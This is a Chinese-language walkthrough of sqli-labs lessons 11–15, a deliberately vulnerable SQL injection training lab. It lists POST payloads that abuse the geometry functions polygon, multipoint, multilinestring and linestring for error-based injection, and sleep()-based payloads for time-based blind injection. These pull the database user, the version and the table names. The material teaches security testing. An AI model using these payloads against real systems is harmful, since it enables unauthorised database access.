sql-liabs通关11-15
目录
3.lesson-13 multilinestring报错注入
1.lesson-11 Polygon报错注入
为单引号的字符型注入
判断注入类型:
使用hackbar的post模块发包,用户名和密码都可以
uname=a&passwd=a%27&submit=Submit
查用户名
uname=a&passwd=a' and polygon((select * from(select * from(select user())a)b))%23&submit=Submit
查表名:
uname=a&passwd=a' and polygon((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a)b))%23&submit=Submit
2.lesson-12 MultiPoint报错注入
为双引号括号的字符型注入
判断注入类型:
uname=a&passwd=a")%23&submit=Submit
查数据库:
uname=a&passwd=a") and multipoint((select * from(select * from(select database())a)b));%23&submit=Submit
查数据表名:
uname=a&passwd=a") and multipoint((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a)b))%23&submit=Submit
3.lesson-13 multilinestring报错注入
为单引号括号的字符型注入
判断注入类型:
uname=a&passwd=a')%23&submit=Submit
查版本:
uname=a&passwd=a') and multilinestring((select * from(select * from(select version())a)b))%23&submit=Submit
查数据表名:
uname=a&passwd=a') and multilinestring((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a)b))%23&submit=Submit
4.lesson-14 LINESTRING报错注入
为双引号的字符型注入
判断注入类型:
uname=a&passwd=a"-- +&submit=Submit
查用户:
uname=a&passwd=a"and LINESTRING((select * from(select * from(select user())a)b))-- +&submit=Submit
查表名:
uname=a&passwd=a"and LINESTRING((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a)b))-- +&submit=Submit
5.lesson-15 时间或布尔盲注
为单引号的字符型注入
使用时间注入
判断注入类型:
uname=a' or sleep(3)-- +&passwd=1&submit=Submit或
uname=admin' and sleep(5)-- +&passwd=a&submit=Submit布尔无法判断闭合符号
这里使用and 或or都可以,使用and时需要注意需要知道用户名,因为判断条件问题,必须为true时,sleep才会延迟,使用or不需要知道用户名,因为or不管真假都为true,都能执行sleep延迟
使用or要注意sleep值要变小一点,or会查所有用户名但不会输出,所以执行时间肯定是设置值的几倍
就像:
其他参考前面的内容
lesson-15参考文章:
https://blog.csdn.net/weixin_41182861/article/details/107727041
